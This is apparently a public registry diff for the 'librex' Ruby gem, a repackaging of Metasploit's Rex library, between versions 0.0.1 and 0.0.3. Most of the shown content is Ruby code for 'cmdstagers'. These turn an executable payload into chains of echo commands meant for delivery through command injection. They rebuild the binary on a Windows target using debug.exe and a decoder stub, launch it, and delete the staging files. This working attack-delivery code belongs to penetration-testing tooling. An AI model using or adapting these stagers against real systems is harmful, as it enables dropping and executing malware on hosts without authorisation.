librex 0.0.1 → 0.0.3

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (53) hide show
  1. data/README +4 -0
  2. data/lib/rex/exploitation/cmdstager.rb +9 -133
  3. data/lib/rex/exploitation/cmdstager/base.rb +170 -0
  4. data/lib/rex/exploitation/cmdstager/debug_asm.rb +142 -0
  5. data/lib/rex/exploitation/cmdstager/debug_write.rb +136 -0
  6. data/lib/rex/exploitation/cmdstager/tftp.rb +63 -0
  7. data/lib/rex/exploitation/cmdstager/vbs.rb +128 -0
  8. data/lib/rex/io/stream.rb +2 -2
  9. data/lib/rex/io/stream_server.rb +1 -1
  10. data/lib/rex/job_container.rb +7 -6
  11. data/lib/rex/mime/header.rb +12 -10
  12. data/lib/rex/mime/message.rb +57 -26
  13. data/lib/rex/ole/directory.rb +5 -4
  14. data/lib/rex/ole/samples/create_ole.rb +0 -0
  15. data/lib/rex/ole/samples/dir.rb +0 -0
  16. data/lib/rex/ole/samples/dump_stream.rb +1 -1
  17. data/lib/rex/ole/samples/ole_info.rb +0 -0
  18. data/lib/rex/parser/nexpose_xml.rb +131 -0
  19. data/lib/rex/parser/nmap_xml.rb +1 -0
  20. data/lib/rex/peparsey/pe.rb +21 -3
  21. data/lib/rex/post/meterpreter/client.rb +6 -1
  22. data/lib/rex/post/meterpreter/client_core.rb +2 -2
  23. data/lib/rex/post/meterpreter/extensions/priv/priv.rb +19 -18
  24. data/lib/rex/post/meterpreter/packet.rb +68 -0
  25. data/lib/rex/post/meterpreter/packet_dispatcher.rb +2 -2
  26. data/lib/rex/post/meterpreter/packet_response_waiter.rb +5 -5
  27. data/lib/rex/post/meterpreter/ui/console.rb +2 -0
  28. data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/fs.rb +5 -2
  29. data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb +2 -2
  30. data/lib/rex/proto/dcerpc/client.rb.ut.rb +0 -0
  31. data/lib/rex/proto/http/client.rb +8 -3
  32. data/lib/rex/proto/http/packet.rb +11 -1
  33. data/lib/rex/proto/smb/client.rb +1 -1
  34. data/lib/rex/proto/smb/utils.rb +72 -24
  35. data/lib/rex/proto/tftp.rb +3 -0
  36. data/lib/rex/proto/tftp/constants.rb +37 -0
  37. data/lib/rex/proto/tftp/server.rb +249 -0
  38. data/lib/rex/proto/tftp/server.rb.ut.rb +28 -0
  39. data/lib/rex/script/meterpreter.rb +6 -0
  40. data/lib/rex/services/local_relay.rb +2 -2
  41. data/lib/rex/socket/ip.rb +9 -8
  42. data/lib/rex/socket/range_walker.rb +43 -5
  43. data/lib/rex/socket/udp.rb +11 -4
  44. data/lib/rex/text.rb +42 -19
  45. data/lib/rex/ui/interactive.rb +24 -22
  46. data/lib/rex/ui/text/irb_shell.rb +4 -2
  47. data/lib/rex/ui/text/output/file.rb +6 -0
  48. data/lib/rex/ui/text/shell.rb +14 -18
  49. data/lib/rex/zip/samples/comment.rb +0 -0
  50. data/lib/rex/zip/samples/mkwar.rb +0 -0
  51. data/lib/rex/zip/samples/mkzip.rb +0 -0
  52. data/lib/rex/zip/samples/recursive.rb +0 -0
  53. metadata +20 -5
data/README CHANGED
@@ -2,3 +2,7 @@ REX
2
2
  ===
3
3
 
4
4
  A non offical re bundling of the Rex library as a gem for easy of consuming the Metasploit REX framework in a non Metasploit application.
5
+
6
+ Currently based on:
7
+ Revision: 9625
8
+
@@ -1,133 +1,9 @@
1
- require 'rex/text'
2
- require 'rex/arch'
3
- require 'msf/core/framework'
4
-
5
- module Rex
6
- module Exploitation
7
-
8
- ###
9
- #
10
- # This class provides an interface to generating cmdstagers.
11
- #
12
- ###
13
-
14
- class CmdStager
15
-
16
- def initialize(code, framework, platform, arch = nil)
17
- @var_decoder = Rex::Text.rand_text_alpha(5)
18
- @var_encoded = Rex::Text.rand_text_alpha(5)
19
- @var_batch = Rex::Text.rand_text_alpha(5)
20
- @decoder = File.join(Msf::Config.install_root, "data", "exploits", "cmdstager", "decoder_stub") # need error checking here
21
- @framework = framework
22
- @linelen = 2047 # covers most likely cases
23
-
24
- # XXX: TODO: support multipl architectures/platforms
25
- @exe = Msf::Util::EXE.to_win32pe(@framework, code)
26
- end
27
-
28
-
29
- #
30
- # Generates the cmd payload including the h2bv2 decoder and encoded payload.
31
- # The resulting commands also perform cleanup, removing any left over files
32
- #
33
- def generate(opts = {}, linelen = 200)
34
- @linelen = linelen
35
-
36
- # Return the output from payload_exe
37
- payload_exe(opts)
38
- end
39
-
40
-
41
- #
42
- # This does the work of actually building an array of commands that
43
- # when executed will create and run an executable payload.
44
- #
45
- def payload_exe(opts)
46
-
47
- persist = opts[:persist]
48
-
49
- # Initialize an arry of commands to execute
50
- cmds = []
51
-
52
- # Add the exe building commands (write to .b64)
53
- cmds += encode_payload()
54
-
55
- # Add the decoder script building commands
56
- cmds += generate_decoder()
57
-
58
- # Make it all happen
59
- cmds << "cscript //nologo %TEMP%\\#{@var_decoder}.vbs"
60
-
61
- # If we're not persisting, clean up afterwards
62
- if (not persist)
63
- cmds << "del %TEMP%\\#{@var_decoder}.vbs"
64
- cmds << "del %TEMP%\\#{@var_encoded}.b64"
65
- end
66
-
67
- # Compress commands into as few lines as possible.
68
- new_cmds = []
69
- line = ''
70
- cmds.each { |cmd|
71
- # If this command will fit...
72
- if ((line.length + cmd.length + 4) < @linelen)
73
- line << " & " if line.length > 0
74
- line << cmd
75
- else
76
- # It won't fit.. If we don't have something error out
77
- if (line.length < 1)
78
- raise RuntimeError, 'Line fit problem -- file a bug'
79
- end
80
- # If it won't fit even after emptying the current line, error out..
81
- if (cmd.length > @linelen)
82
- raise RuntimeError, 'Line too long - %d bytes' % cmd.length
83
- end
84
- new_cmds << line
85
- line = ''
86
- line << cmd
87
- end
88
- }
89
- new_cmds << line if (line.length > 0)
90
-
91
- # Return the final array.
92
- new_cmds
93
- end
94
-
95
-
96
- def generate_decoder()
97
- # Read the decoder data file
98
- f = File.new(@decoder, "rb")
99
- decoder = f.read(f.stat.size)
100
- f.close
101
-
102
- # Replace variables
103
- decoder.gsub!(/decode_stub/, "%TEMP%\\#{@var_decoder}.vbs")
104
- decoder.gsub!(/ENCODED/, "%TEMP%\\#{@var_encoded}.b64")
105
- decoder.gsub!(/DECODED/, "%TEMP%\\#{@var_batch}.exe")
106
-
107
- # Split it apart by the lines
108
- decoder.split("\n")
109
- end
110
-
111
-
112
- def encode_payload()
113
- tmp = Rex::Text.encode_base64(@exe)
114
- orig = tmp.dup
115
-
116
- cmds = []
117
- l_start = "echo "
118
- l_end = ">>%TEMP%\\#{@var_encoded}.b64"
119
- xtra_len = l_start.length + @var_encoded.length + l_end.length + 1
120
- while (tmp.length > 0)
121
- cmd = ''
122
- cmd << l_start
123
- cmd << tmp.slice!(0, (@linelen - xtra_len))
124
- cmd << l_end
125
- cmds << cmd
126
- end
127
-
128
- cmds
129
- end
130
-
131
- end
132
- end
133
- end
1
+ ##
2
+ # $Id: cmdstager.rb 9375 2010-05-26 22:39:56Z jduck $
3
+ ##
4
+
5
+ require 'rex/exploitation/cmdstager/base'
6
+ require 'rex/exploitation/cmdstager/vbs'
7
+ require 'rex/exploitation/cmdstager/debug_write'
8
+ require 'rex/exploitation/cmdstager/debug_asm'
9
+ require 'rex/exploitation/cmdstager/tftp'
@@ -0,0 +1,170 @@
1
+ require 'rex/text'
2
+ require 'rex/arch'
3
+ require 'msf/core/framework'
4
+
5
+ module Rex
6
+ module Exploitation
7
+
8
+ ###
9
+ #
10
+ # This class provides an interface to generating cmdstagers.
11
+ #
12
+ ###
13
+
14
+ class CmdStagerBase
15
+
16
+ def initialize(exe)
17
+ @linemax = 2047 # covers most likely cases
18
+ @exe = exe
19
+ end
20
+
21
+ #
22
+ # Generates the cmd payload including the h2bv2 decoder and encoded payload.
23
+ # The resulting commands also perform cleanup, removing any left over files
24
+ #
25
+ def generate(opts = {})
26
+ # Allow temporary directory override
27
+ @tempdir = opts[:temp]
28
+ @tempdir ||= "%TEMP%\\"
29
+ if (@tempdir == '.')
30
+ @tempdir = ''
31
+ end
32
+
33
+ opts[:linemax] ||= @linemax
34
+
35
+ generate_cmds(opts)
36
+ end
37
+
38
+
39
+ #
40
+ # This does the work of actually building an array of commands that
41
+ # when executed will create and run an executable payload.
42
+ #
43
+ def generate_cmds(opts)
44
+
45
+ # Initialize an arry of commands to execute
46
+ cmds = []
47
+
48
+ # Add the exe building commands
49
+ cmds += generate_cmds_payload(opts)
50
+
51
+ # Add the decoder script building commands
52
+ cmds += generate_cmds_decoder(opts)
53
+
54
+ compress_commands(cmds, opts)
55
+ end
56
+
57
+
58
+ #
59
+ # Generate the commands to create an encoded version of the
60
+ # payload file
61
+ #
62
+ def generate_cmds_payload(opts)
63
+
64
+ # First encode the payload
65
+ encoded = encode_payload(opts)
66
+
67
+ # Now split it up into usable pieces
68
+ parts = slice_up_payload(encoded, opts)
69
+
70
+ # Turn each part into a valid command
71
+ parts_to_commands(parts, opts)
72
+ end
73
+
74
+ #
75
+ # This method is intended to be override by the child class
76
+ #
77
+ def encode_payload(opts)
78
+ # Defaults to nothing
79
+ ""
80
+ end
81
+
82
+ #
83
+ # We take a string of data and turn it into an array of parts.
84
+ #
85
+ # We save opts[:extra] bytes out of every opts[:linemax] for the parts
86
+ # appended and prepended to the resulting elements.
87
+ #
88
+ def slice_up_payload(encoded, opts)
89
+ tmp = encoded.dup
90
+
91
+ parts = []
92
+ xtra_len = opts[:extra]
93
+ xtra_len ||= 0
94
+ while (tmp.length > 0)
95
+ parts << tmp.slice!(0, (opts[:linemax] - xtra_len))
96
+ end
97
+
98
+ parts
99
+ end
100
+
101
+ #
102
+ # Combine the parts of the encoded file with the stuff that goes
103
+ # before / after it -- example "echo " and " >>file"
104
+ #
105
+ def parts_to_commands(parts, opts)
106
+ # Return as-is
107
+ parts
108
+ end
109
+
110
+
111
+
112
+ #
113
+ # Generate the commands that will decode the file we just created
114
+ #
115
+ def generate_cmds_decoder(opts)
116
+ # Defaults to no commands.
117
+ []
118
+ end
119
+
120
+
121
+
122
+ #
123
+ # Compress commands into as few lines as possible. Minimizes the number of
124
+ # commands to execute while maximizing the number of commands per execution.
125
+ #
126
+ def compress_commands(cmds, opts)
127
+ new_cmds = []
128
+ line = ''
129
+ concat = cmd_concat_operator
130
+ cmds.each { |cmd|
131
+
132
+ # If this command will fit, concat it and move on.
133
+ if ((line.length + cmd.length + concat.length) < opts[:linemax])
134
+ line << concat if line.length > 0
135
+ line << cmd
136
+ next
137
+ end
138
+
139
+ # The command wont fit concat'd to this line, if we have something,
140
+ # we have to add it to the array now.
141
+ if (line.length > 0)
142
+ new_cmds << line
143
+ line = ''
144
+ end
145
+
146
+ # If it won't fit even after emptying the current line, error out..
147
+ if (cmd.length > opts[:linemax])
148
+ raise RuntimeError, 'Line too long - %u bytes, max %u' % [cmd.length, opts[:linemax]]
149
+ end
150
+
151
+ # It will indeed fit by itself, lets add it.
152
+ line << cmd
153
+
154
+ }
155
+ new_cmds << line if (line.length > 0)
156
+
157
+ # Return the final array.
158
+ new_cmds
159
+ end
160
+
161
+ #
162
+ # Can be overriden. For exmaple, use for unix use ";" instead
163
+ #
164
+ def cmd_concat_operator
165
+ ""
166
+ end
167
+
168
+ end
169
+ end
170
+ end
@@ -0,0 +1,142 @@
1
+ ##
2
+ # $Id$
3
+ ##
4
+
5
+ require 'rex/text'
6
+ require 'rex/arch'
7
+ require 'msf/core/framework'
8
+
9
+ module Rex
10
+ module Exploitation
11
+
12
+ ###
13
+ #
14
+ # This class provides the ability to create a sequence of commands from an executable.
15
+ # When this sequence is ran via command injection or a shell, the resulting exe will
16
+ # be written to disk and executed.
17
+ #
18
+ # This particular version uses debug.exe to assemble a small COM file. The COM will
19
+ # take a hex-ascii file, created via echo >>, and decode it to the final binary.
20
+ #
21
+ # Requires: debug.exe
22
+ #
23
+ # Written by Joshua J. Drake
24
+ #
25
+ ###
26
+
27
+ class CmdStagerDebugAsm < CmdStagerBase
28
+
29
+ def initialize(exe)
30
+ super
31
+
32
+ @var_decoder_asm = Rex::Text.rand_text_alpha(8) + ".dat"
33
+ @var_decoder_com = Rex::Text.rand_text_alpha(8) + ".com"
34
+ @var_payload_in = Rex::Text.rand_text_alpha(8) + ".dat"
35
+ @var_payload_out = Rex::Text.rand_text_alpha(8) + ".exe"
36
+ @decoder = nil # filled in later
37
+ end
38
+
39
+
40
+ #
41
+ # Override just to set the extra byte count
42
+ #
43
+ def generate_cmds(opts)
44
+ # Set the start/end of the commands here (vs initialize) so we have @tempdir
45
+ @cmd_start = "echo "
46
+ @cmd_end = ">>#{@tempdir}#{@var_payload_in}"
47
+ xtra_len = @cmd_start.length + @cmd_end.length + 1
48
+ opts.merge!({ :extra => xtra_len })
49
+ super
50
+ end
51
+
52
+
53
+ #
54
+ # Simple hex encoding...
55
+ #
56
+ def encode_payload(opts)
57
+ ret = @exe.unpack('H*')[0]
58
+ end
59
+
60
+
61
+ #
62
+ # Combine the parts of the encoded file with the stuff that goes
63
+ # before / after it.
64
+ #
65
+ def parts_to_commands(parts, opts)
66
+
67
+ cmds = []
68
+ parts.each do |p|
69
+ cmd = ''
70
+ cmd << @cmd_start
71
+ cmd << p
72
+ cmd << @cmd_end
73
+ cmds << cmd
74
+ end
75
+
76
+ cmds
77
+ end
78
+
79
+
80
+ #
81
+ # Generate the commands that will decode the file we just created
82
+ #
83
+ def generate_cmds_decoder(opts)
84
+
85
+ # Allow decoder stub override (needs to input base64 and output bin)
86
+ @decoder = opts[:decoder] if (opts[:decoder])
87
+
88
+ # Read the decoder data file
89
+ f = File.new(@decoder, "rb")
90
+ decoder = f.read(f.stat.size)
91
+ f.close
92
+
93
+ # Replace variables
94
+ decoder.gsub!(/decoder_stub/, "#{@tempdir}#{@var_decoder_asm}")
95
+ decoder.gsub!(/h2b\.com/, "#{@tempdir}#{@var_decoder_com}")
96
+ # NOTE: these two filenames MUST 8+3 chars long.
97
+ decoder.gsub!(/testfile\.dat/, "#{@var_payload_in}")
98
+ decoder.gsub!(/testfile\.out/, "#{@var_payload_out}")
99
+
100
+ # Split it apart by the lines
101
+ decoder.split("\n")
102
+ end
103
+
104
+
105
+ #
106
+ # We override compress commands just to stick in a few extra commands
107
+ # last second..
108
+ #
109
+ def compress_commands(cmds, opts)
110
+ # Convert the debug script to an executable...
111
+ cvt_cmd = ''
112
+ if (@tempdir != '')
113
+ cvt_cmd << "cd %TEMP% && "
114
+ end
115
+ cvt_cmd << "debug < #{@tempdir}#{@var_decoder_asm}"
116
+ cmds << cvt_cmd
117
+
118
+ # Convert the encoded payload...
119
+ cmds << "#{@tempdir}#{@var_decoder_com}"
120
+
121
+ # Make it all happen
122
+ cmds << "start #{@tempdir}#{@var_payload_out}"
123
+
124
+ # Clean up after unless requested not to..
125
+ if (not opts[:nodelete])
126
+ cmds << "del #{@tempdir}#{@var_decoder_asm}"
127
+ cmds << "del #{@tempdir}#{@var_decoder_com}"
128
+ cmds << "del #{@tempdir}#{@var_payload_in}"
129
+ # XXX: We won't be able to delete the payload while it is running..
130
+ end
131
+
132
+ super
133
+ end
134
+
135
+ # Windows uses & to concat strings
136
+ def cmd_concat_operator
137
+ " & "
138
+ end
139
+
140
+ end
141
+ end
142
+ end